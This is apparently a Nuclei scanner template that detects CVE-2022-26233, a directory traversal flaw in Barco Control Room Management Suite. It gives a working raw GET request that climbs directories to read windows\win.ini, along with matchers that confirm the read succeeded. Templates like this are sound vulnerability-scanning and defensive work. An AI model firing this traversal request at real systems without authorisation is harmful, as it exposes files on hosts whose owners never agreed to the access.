id: CVE-2022-26233 info: name: Barco Control Room Management Suite - Directory Traversal author: 0x_Akoko severity: high description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. reference: - https://0day.today/exploit/37579 - https://www.cvedetails.com/cve/CVE-2022-26233 - http://seclists.org/fulldisclosure/2022/Apr/0 - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-26233 cwe-id: CWE-22 tags: cve,cve2022,barco,lfi requests: - raw: - |+ GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 Host: {{Hostname}} unsafe: true matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and